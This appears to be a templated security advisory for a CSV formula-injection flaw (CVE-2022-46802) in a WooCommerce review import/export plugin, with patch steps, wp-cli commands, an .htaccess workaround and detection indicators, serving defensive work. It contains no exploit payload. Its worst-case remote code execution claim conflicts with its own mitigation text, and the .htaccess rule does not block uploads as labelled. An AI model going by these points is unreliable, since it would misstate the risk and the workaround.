CVE-2022-46802
📋 TL;DR
This vulnerability allows attackers to inject malicious formulas into CSV files processed by the WooCommerce plugin, which can lead to arbitrary code execution when the CSV is opened in spreadsheet applications. It affects all WordPress sites using the Product Reviews Import Export for WooCommerce plugin version 1.4.8 and earlier. The attack can be performed without authentication.
💻 Affected Systems
- Product Reviews Import Export for WooCommerce WordPress plugin
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Remote code execution on the WordPress server, complete compromise of the WooCommerce store, theft of customer data, and financial fraud.
Likely Case
Data exfiltration, manipulation of product reviews, and potential privilege escalation within the WordPress environment.
If Mitigated
Limited to CSV formula injection affecting spreadsheet applications opening exported files, with no server-side code execution.
🎯 Exploit Status
CSV injection attacks are well-documented and easy to weaponize. The vulnerability requires user interaction (opening CSV files) for full impact.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.4.9 or later
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Go to Plugins → Installed Plugins. 3. Find 'Product Reviews Import Export for WooCommerce'. 4. Click 'Update Now' if available. 5. If no update appears, manually download version 1.4.9+ from WordPress.org and replace the plugin files.
🔧 Temporary Workarounds
Disable plugin
allTemporarily disable the vulnerable plugin until patched
wp plugin deactivate product-reviews-import-export-for-woocommerce
Restrict CSV uploads
linuxBlock CSV file uploads via web application firewall or .htaccess
# Add to .htaccess:
<FilesMatch "\.(csv)$">
Order Allow,Deny
Deny from all
</FilesMatch>
🧯 If You Can't Patch
- Disable the plugin completely and use alternative review management methods
- Implement strict input validation for all CSV uploads and sanitize formula characters (=, +, -, @)
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Product Reviews Import Export for WooCommerce → Version numberCheck Version:
wp plugin get product-reviews-import-export-for-woocommerce --field=versionVerify Fix Applied:
Confirm plugin version is 1.4.9 or higher in WordPress admin panel📡 Detection & Monitoring
Log Indicators:
- Unusual CSV file uploads
- Multiple failed CSV import attempts
- CSV files with formula characters in content
Network Indicators:
- POST requests to /wp-admin/admin-ajax.php with CSV data
- CSV file downloads from unexpected sources
SIEM Query:
source="wordpress" AND (uri_path="/wp-content/plugins/product-reviews-import-export-for-woocommerce/*" OR file_extension="csv")🔗 References
- https://patchstack.com/database/vulnerability/product-reviews-import-export-for-woocommerce/wordpress-product-reviews-import-export-for-woocommerce-plugin-1-4-8-unauth-csv-injection-vulnerability?_s_id=cve
- https://patchstack.com/database/vulnerability/product-reviews-import-export-for-woocommerce/wordpress-product-reviews-import-export-for-woocommerce-plugin-1-4-8-unauth-csv-injection-vulnerability?_s_id=cve
